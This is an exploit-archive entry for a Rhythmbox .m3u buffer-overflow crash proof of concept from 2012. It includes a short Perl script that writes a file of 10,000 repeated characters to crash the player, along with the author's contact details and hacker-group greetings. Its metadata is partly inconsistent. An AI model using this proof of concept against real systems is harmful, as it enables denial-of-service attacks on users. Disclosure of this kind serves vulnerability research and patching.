header-logo
Suggest Exploit
vendor:
Rhythmbox
by:
Caddy-Dz
7.5
CVSS
HIGH
Local Crash
119
CWE
Product Name: Rhythmbox
Affected Version From: All versions prior to 3.4.2
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: a:gnome:rhythmbox
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Ubuntu 10.10
2012

Rhythmbox (.m3u) Local Crash Poc

A buffer overflow vulnerability exists in Rhythmbox, which is a music player for GNOME. The vulnerability is triggered when a specially crafted .m3u file is opened, resulting in a crash of the application. This vulnerability affects all versions of Rhythmbox prior to 3.4.2.

Mitigation:

Upgrade to the latest version of Rhythmbox (3.4.2) to mitigate this vulnerability.
Source

Exploit-DB raw data:

####
# Exploit Title: Rhythmbox (.m3u) Local Crash Poc
# Vendor: http://projects.gnome.org/rhythmbox/
# Author: Caddy-Dz
# Facebook Page: www.facebook.com/islam.caddy
# E-mail: islam_babia@hotmail.com  |  Caddy-Dz@exploit-id.com
# Website: www.exploit-id.com
# Category:: webapps
# Tested on: [Ubuntu 10.10 - French]
####

# Note ! : Rhythmbox Is Allready installed on Ubuntu
# Applications => Son et Vidéo => Lecteur de musique Rhythmbox



#!/usr/bin/perl

my $bof="\x41" x 10000;
open (FILE,">> Caddy-Dz.M3U");
print FILE $bof;
close (FILE);


####

[+] Peace From Algeria

####

=================================**Algerians Hackers**=======================================|
# Greets To :                                                                                |
  KedAns-Dz , Kalashinkov3 & **All Algerians Hackers** , jos_ali_joe , Z190T ,               |
  All Exploit-Id Team , (exploit-id.com) , (1337day.com) , (09exploit.com) ,                 |
  All My Friends: T!riRou , ChoK0 , MeRdaw! , CaRras0 , StiffLer , MaaTar , St0fa , Nissou , | 
  RmZ ...others                                                                              |
============================================================================================ |

Navigation

Suggest Exploit

Services By CQR